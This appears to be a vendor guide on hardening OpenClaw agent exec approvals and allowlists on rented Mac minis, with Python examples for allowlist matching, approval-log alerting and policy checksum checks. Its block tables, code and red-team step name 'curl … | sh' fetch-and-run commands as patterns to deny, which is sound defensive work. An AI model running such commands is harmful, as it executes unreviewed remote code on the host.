OpenClaw Exec Approvals and Allowlists on Shared Rented Mac mini: 2026 Matrix on VmMac
Platform security owners who deploy OpenClaw on rented Apple Silicon Mac mini from VmMac must treat tools.exec as host-level root authority, not “just another plugin.” Community documentation describes exec approvals as the interlock between autonomous agents and shell commands: policies combine security mode, ask behavior, and allowlists, with a conservative askFallback when no UI is present. This 2026 matrix translates those concepts into operations for launchd-managed gateways across Hong Kong, Japan, Korea, Singapore, and the United States. Pair it with secrets and plist hygiene, staging vs production launchd isolation, and Node PATH discipline so approvals never become the only line of defense.
VmMac provides SSH and optional VNC; you own policy files and audit trails. Use help docs for access patterns and pricing when you split prod agents onto dedicated hosts after tightening exec.
Shared-Tenant Threat Model on a Single macOS Host
When two squads share one macOS user—or even separate users but one admin group—exec allowlists still cannot prevent a compromised dependency from rewriting policy files on disk. Add defensive layers around them: non-admin automation accounts, immutable policy artifacts in git with checksum verification on boot, and separate OpenClaw state roots per environment. If more than one human has sudo on the same host that runs unattended agents, classify the machine as non-compliant until roles are split.
- Numeric alert: page when exec.approval.requested events exceed 40 per hour on unattended lanes—usually a policy bug or a prompt storm.
- Numeric alert: block promotion when deny outcomes exceed 15% of exec attempts in a rolling day; you may be blocking work that could safely be automated.
tools.exec.security: deny, allowlist, and full
| Mode | Meaning | Best fit on VmMac mini | Risk note |
|---|---|---|---|
| deny | Block all host exec | Read-only research bots | Zero shell exfil; may break workflows |
| allowlist | Only matched commands | Default for shared CI-adjacent hosts | Requires disciplined list reviews weekly |
| full | Permissive execution | Ephemeral sandboxes only | Treat as temporary; max 72h TTL |
Ask Modes, Prompt Storms, and askFallback for Headless launchd
Ask policies decide whether operators must acknowledge risky commands. Under launchd, always ask without a companion UI becomes a self-inflicted outage: tasks stall until timeout. Prefer on-miss with a tight allowlist for unattended hosts, and set askFallback to deny unless you operate a staffed control channel 24/7. When product releases change approval semantics—as upstream discussions in 2026 highlighted—pin OpenClaw versions and rehearse upgrades on a staging mini before production.
Allowlist Shape: Prefixes, argv Patterns, and Auditability
Good allowlists read like infrastructure code: explicit binaries under /usr/bin, /bin, and your pinned toolchains—never broad sh -c wildcards unless wrapped by a reviewed script checked into git. Rotate lists when dependencies move paths after Homebrew upgrades; correlate with install & deploy guide checkpoints.
Split allowlists into three layers for readability: bootstrap (package managers and health probes), build (compilers and test runners), and deploy (rsync/scp/curl to approved endpoints). Each layer should carry its own owner in CODEOWNERS. During incidents, freeze edits to non-bootstrap layers first so operators can still restart gateways without widening full mode. Keep a temporary break-glass entry that expires after 48 hours with an automatic revert ticket—human forgetfulness is how wildcard shells return.
| Pattern | Verdict | Why |
|---|---|---|
| `/opt/homebrew/bin/git` with fixed subcommands | ✓ Prefer | Auditable argv surface |
| `bash -lc "curl … \| sh"` | ✗ Block | Unbounded downstream exec |
| Wrapper script in `/usr/local/bin/vm-*` | ✓ If signed + versioned | Centralizes policy changes |
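The evaluation order that the ask-mode section and the allowlist table describe, written out as an added example (this is not OpenClaw's code, and the entry schema, the `Entry`/`Policy` names and the event of a shell launcher being refused a match are assumptions made here). It matches an absolute binary plus a fixed argv prefix, lets break-glass entries age out, and applies askFallback only when a prompt is needed and no UI can answer it:

```python
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone
from typing import List, Optional, Tuple
import shlex

# Tokens that hand control to a shell: an entry that "matches" these has no
# bounded argv surface, so the evaluator refuses to match them at all.
SHELL_LAUNCHERS = {"sh", "bash", "zsh", "env", "/bin/sh", "/bin/bash", "/bin/zsh", "/usr/bin/env"}
SHELL_OPERATORS = {"|", "||", ";", "&&", "&"}


@dataclass(frozen=True)
class Entry:
    """One allowlist line: absolute binary + fixed leading argv (assumed schema)."""
    binary: str                         # e.g. /opt/homebrew/bin/git
    argv_prefix: Tuple[str, ...]        # e.g. ("status",); anything after it may vary
    layer: str                          # bootstrap | build | deploy
    expires: Optional[datetime] = None  # set only on break-glass entries


@dataclass
class Policy:
    security: str      # deny | allowlist | full
    ask: str           # always | on-miss | off
    ask_fallback: str  # verdict used when a prompt is needed but no UI can answer it
    entries: List[Entry] = field(default_factory=list)


def matching_entry(policy: Policy, argv: List[str], now: datetime) -> Optional[Entry]:
    """First unexpired entry whose binary and fixed argv prefix match argv."""
    if not argv or argv[0] in SHELL_LAUNCHERS or any(t in SHELL_OPERATORS for t in argv):
        return None
    for entry in policy.entries:
        if entry.expires is not None and now >= entry.expires:
            continue  # break-glass entry has aged out: behave as if it were removed
        n = len(entry.argv_prefix)
        if argv[0] == entry.binary and tuple(argv[1:1 + n]) == entry.argv_prefix:
            return entry
    return None


def decide(policy: Policy, command: str, now: datetime, ui_present: bool) -> Tuple[str, str]:
    """Return (verdict, reason); verdict is allow, deny or ask."""
    if policy.security == "deny":
        return "deny", "security=deny blocks every host exec"
    if policy.security == "full":
        return "allow", "security=full: permissive, ephemeral sandboxes only"
    argv = shlex.split(command)
    entry = matching_entry(policy, argv, now)
    if policy.ask == "always":
        needs_prompt = True
    elif policy.ask == "on-miss":
        needs_prompt = entry is None
    else:  # ask=off: the allowlist alone decides
        needs_prompt = False
    if not needs_prompt:
        if entry is None:
            return "deny", "no allowlist match and ask=off"
        return "allow", f"matched {entry.layer} entry {entry.binary} {' '.join(entry.argv_prefix)}".rstrip()
    if ui_present:
        return "ask", "operator prompt required"
    return policy.ask_fallback, f"no UI to answer the prompt; askFallback={policy.ask_fallback}"


NOW = datetime(2026, 3, 1, tzinfo=timezone.utc)  # fixed clock for the worked example
LATER = NOW + timedelta(hours=49)                 # after the 48-hour break-glass entry expires


def example_policy() -> Policy:
    """Constructed three-layer allowlist with one 48-hour break-glass deploy entry."""
    return Policy(
        security="allowlist",
        ask="on-miss",
        ask_fallback="deny",
        entries=[
            Entry("/opt/homebrew/bin/brew", ("list",), "bootstrap"),
            Entry("/opt/homebrew/bin/git", ("status",), "build"),
            Entry("/usr/bin/rsync", ("-a", "./dist/", "deploy@staging.example.invalid:/srv/"),
                  "deploy", expires=NOW + timedelta(hours=48)),
        ],
    )


if __name__ == "__main__":
    unattended = False  # launchd lane: nobody is watching a GUI prompt
    for cmd in ["/opt/homebrew/bin/git status --short",
                "/opt/homebrew/bin/git push origin main",
                'bash -lc "curl https://example.invalid/install.sh | sh"']:
        print(cmd, "->", decide(example_policy(), cmd, NOW, unattended))
```

On the unattended lane the `git push` and the `bash -lc` wrapper both end in `deny` through askFallback rather than stalling on a prompt; with a UI present the same two commands become `ask`, which is the prompt-storm failure mode the ask-mode section warns about.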
Why launchd Changes the Approval UX
Interactive Mac users resolve approvals in a UI session. launchd agents do not. Bridge the gap with either a paired operator workflow (alerts to Slack with signed approval links) or a dedicated VNC break-glass account for rare interactive resolves—document both in your runbook alongside VNC hardening. Never leave agents waiting on GUI prompts that nobody watches overnight.
Measure queue depth for pending approvals: if the backlog exceeds 5 items for more than 10 minutes, page infrastructure—not the ML team. Sustained backlog usually means your allowlist is too tight for real tasks or your ask mode is mis-set for unattended lanes. After each incident, capture the denied argv prefix in your postmortem template so the same miss does not require a second human wake-up call within 30 days.
For multi-agent fleets described in 24h automation patterns, shard high-risk tools onto hosts with stricter deny defaults while leaving read-mostly researchers on separate labels—mixed risk on one plist is how approvals become noise.
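The three numeric alerts on this page (more than 40 `exec.approval.requested` events per hour on an unattended lane, deny outcomes above 15% of attempts in a rolling day, and a pending backlog above 5 for more than 10 minutes) as detection logic over structured approval logs. This is an added example, not OpenClaw's or VmMac's tooling; the JSON-lines layout, the `exec.approval.resolved` companion event and the sample log are constructed assumptions, and "attempts" is simplified to resolved approvals:

```python
import json
from collections import Counter
from datetime import datetime, timedelta, timezone
from typing import Dict, List

REQUESTED = "exec.approval.requested"  # event name used on the page
RESOLVED = "exec.approval.resolved"    # assumed companion event carrying the outcome

REQUESTS_PER_HOUR_MAX = 40  # page above this on unattended lanes
DENY_RATIO_MAX = 0.15       # block promotion above this over a rolling day
BACKLOG_MAX = 5             # pending approvals...
BACKLOG_MINUTES = 10        # ...sustained longer than this page infrastructure

# Constructed JSON-lines log (not real OpenClaw output): six requests in under
# three minutes on an unattended lane, the first one resolved only 14 minutes later.
SAMPLE_LOG = """\
{"ts":"2026-03-01T02:00:00Z","event":"exec.approval.requested","id":"r1","lane":"unattended"}
{"ts":"2026-03-01T02:00:30Z","event":"exec.approval.requested","id":"r2","lane":"unattended"}
{"ts":"2026-03-01T02:01:00Z","event":"exec.approval.requested","id":"r3","lane":"unattended"}
{"ts":"2026-03-01T02:01:30Z","event":"exec.approval.requested","id":"r4","lane":"unattended"}
{"ts":"2026-03-01T02:02:00Z","event":"exec.approval.requested","id":"r5","lane":"unattended"}
{"ts":"2026-03-01T02:02:30Z","event":"exec.approval.requested","id":"r6","lane":"unattended"}
{"ts":"2026-03-01T02:14:00Z","event":"exec.approval.resolved","id":"r1","outcome":"allow"}
{"ts":"2026-03-01T02:15:00Z","event":"exec.approval.resolved","id":"r2","outcome":"deny"}
{"ts":"2026-03-01T02:16:00Z","event":"exec.approval.resolved","id":"r3","outcome":"deny"}
{"ts":"2026-03-01T02:17:00Z","event":"exec.approval.resolved","id":"r4","outcome":"allow"}
{"ts":"2026-03-01T02:18:00Z","event":"exec.approval.resolved","id":"r5","outcome":"allow"}
{"ts":"2026-03-01T02:19:00Z","event":"exec.approval.resolved","id":"r6","outcome":"allow"}
"""
NOW = datetime(2026, 3, 1, 3, 0, tzinfo=timezone.utc)  # evaluation time for the example


def parse(log_text: str) -> List[Dict]:
    """Parse JSON lines into events sorted by timestamp."""
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        event["ts"] = datetime.fromisoformat(event["ts"].replace("Z", "+00:00"))
        events.append(event)
    return sorted(events, key=lambda e: e["ts"])


def peak_requests_per_hour(events: List[Dict], lane: str = "unattended") -> int:
    """Busiest clock hour of approval requests on the given lane."""
    buckets = Counter(e["ts"].replace(minute=0, second=0, microsecond=0)
                      for e in events if e["event"] == REQUESTED and e.get("lane") == lane)
    return max(buckets.values(), default=0)


def deny_ratio(events: List[Dict], now: datetime, window: timedelta = timedelta(days=1)) -> float:
    """Share of resolved approvals in the rolling window that ended in deny."""
    resolved = [e for e in events if e["event"] == RESOLVED and now - e["ts"] <= window]
    if not resolved:
        return 0.0
    return sum(e["outcome"] == "deny" for e in resolved) / len(resolved)


def longest_backlog_breach(events: List[Dict], threshold: int = BACKLOG_MAX) -> float:
    """Longest stretch, in minutes, during which pending approvals exceeded threshold."""
    pending, breach_start, longest = set(), None, timedelta(0)
    for e in events:
        if e["event"] == REQUESTED:
            pending.add(e["id"])
        elif e["event"] == RESOLVED:
            pending.discard(e["id"])
        over = len(pending) > threshold
        if over and breach_start is None:
            breach_start = e["ts"]
        elif not over and breach_start is not None:
            longest = max(longest, e["ts"] - breach_start)
            breach_start = None
    if breach_start is not None and events:  # still breached at end of log
        longest = max(longest, events[-1]["ts"] - breach_start)
    return longest.total_seconds() / 60


def alerts(events: List[Dict], now: datetime) -> List[str]:
    """Apply the page's three thresholds and return the actions they trigger."""
    out = []
    if peak_requests_per_hour(events) > REQUESTS_PER_HOUR_MAX:
        out.append("page: prompt storm on unattended lane")
    if deny_ratio(events, now) > DENY_RATIO_MAX:
        out.append("block promotion: deny ratio above 15%")
    if longest_backlog_breach(events) > BACKLOG_MINUTES:
        out.append("page infrastructure: approval backlog above 5 for over 10 minutes")
    return out


if __name__ == "__main__":
    for line in alerts(parse(SAMPLE_LOG), NOW):
        print(line)
```

The sample stays under the 40-per-hour line but trips both the deny-ratio (2 of 6) and the backlog rule (6 pending from 02:02:30 until 02:14:00), which is the "allowlist too tight for real tasks" signature the paragraph above describes.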
Seven-Step Hardening Runbook
- Inventory every tool that calls host exec; tag each as required or delete.
- Set `tools.exec.security=allowlist` in staging; capture denials for seven days.
- Build allowlist revision v1 with ≤ 25 entries; justify each in git blame.
- Set `ask` to `on-miss` with `askFallback=deny` on unattended hosts.
- Wire structured logs for approval events per rotation guidance.
- Rehearse upgrade on a VmMac mini in each of five regions before flipping prod.
- Quarterly red-team: attempt `curl | bash` style tasks and confirm deny paths.
Five-Region Policy Parity
Latency does not change exec semantics, but operator calendars do: a Singapore Friday deploy might miss US Thursday policy drift. Store policy checksums in your observability stack and fail CI if a region drifts by more than one revision. Add capacity from pricing before you temporarily widen allowlists under load—that shortcut ages into debt within days.
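A CI-side parity check that covers both the boot-time checksum verification from the shared-tenant section and the "fail CI if a region drifts by more than one revision" rule above. It is an added example rather than VmMac or OpenClaw code; the manifest layout (region, revision, sha256 committed to git), the policy file names and the nested JSON spelling of `tools.exec.security` are assumptions, and `demo()` fabricates a five-region fleet in a temp directory:

```python
import hashlib
import json
import tempfile
from pathlib import Path
from typing import Dict, List

REGIONS = ["hk", "jp", "kr", "sg", "us"]  # the five VmMac regions named on the page
MAX_REVISION_LAG = 1                      # fail CI when a region lags by more than this


def sha256_file(path: Path) -> str:
    """Streamed SHA-256 of a policy file on disk."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def check_parity(policy_files: Dict[str, Path], manifest: Dict[str, Dict]) -> List[str]:
    """Return CI failure reasons; an empty list means every region is in parity.

    manifest shape (assumed): {"hk": {"revision": 5, "sha256": "..."}, ...}
    """
    problems = []
    for region, path in policy_files.items():
        expected = manifest.get(region)
        if expected is None:
            problems.append(f"{region}: no manifest entry")
            continue
        # A file that no longer hashes to the committed value was edited outside git,
        # which is the on-disk rewrite the shared-tenant threat model warns about.
        if sha256_file(path) != expected["sha256"]:
            problems.append(f"{region}: checksum mismatch (policy edited outside git?)")
    revisions = {r: manifest[r]["revision"] for r in policy_files if r in manifest}
    if revisions:
        newest = max(revisions.values())
        for region, rev in revisions.items():
            if newest - rev > MAX_REVISION_LAG:
                problems.append(f"{region}: revision {rev} lags newest {newest} "
                                f"by more than {MAX_REVISION_LAG}")
    return problems


def demo() -> List[str]:
    """Constructed fleet: kr lags two revisions, sg lags one, us was hand-edited."""
    revisions = {"hk": 5, "jp": 5, "kr": 3, "sg": 4, "us": 5}
    with tempfile.TemporaryDirectory() as tmp:
        root, manifest, files = Path(tmp), {}, {}
        for region in REGIONS:
            policy = {"tools": {"exec": {"security": "allowlist", "ask": "on-miss",
                                         "askFallback": "deny"}},
                      "revision": revisions[region]}
            content = json.dumps(policy, indent=2).encode()
            path = root / f"{region}-policy.json"  # assumed file name
            path.write_bytes(content)
            manifest[region] = {"revision": revisions[region],
                                "sha256": hashlib.sha256(content).hexdigest()}
            files[region] = path
        # Simulate an out-of-band edit on the US host after the manifest was committed.
        files["us"].write_bytes(files["us"].read_bytes().replace(b'"allowlist"', b'"full"'))
        return check_parity(files, manifest)


if __name__ == "__main__":
    for problem in demo():
        print("FAIL", problem)
```

Run the same `check_parity` on boot from the gateway's launchd wrapper against the committed manifest and refuse to start on any problem; in CI, `sg` lagging by one revision passes while `kr` at two behind and the hand-edited `us` file both fail.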
FAQ: Exec Approvals on Rented Mac mini
Should prod and staging share one allowlist? No—fork files and merge with review like application code.
Does VmMac enforce OpenClaw policies? No—you implement them; VmMac provides the Mac mini and network path.
What if upgrades re-enable prompts? Pin versions, read upstream release notes, and rehearse on staging per gateway recovery playbooks.
Why Mac mini M4 and VmMac Still Fit High-Assurance Agents
Apple Silicon Mac mini gives predictable single-host performance for always-on agents while keeping physical TCC boundaries clearer than nested VMs. Renting across Hong Kong, Japan, Korea, Singapore, and the United States lets you isolate risky exec policies onto smaller fleets before promoting globally. VmMac is not a policy engine—it is metal you can segment. Pair hardware tenancy with exec allowlists, and autonomous tools finally look boring on the balance sheet.
Isolate Agents Before You Widen Exec
Add a dedicated Mac mini in the nearest VmMac region for staging approvals and allowlist burn-in.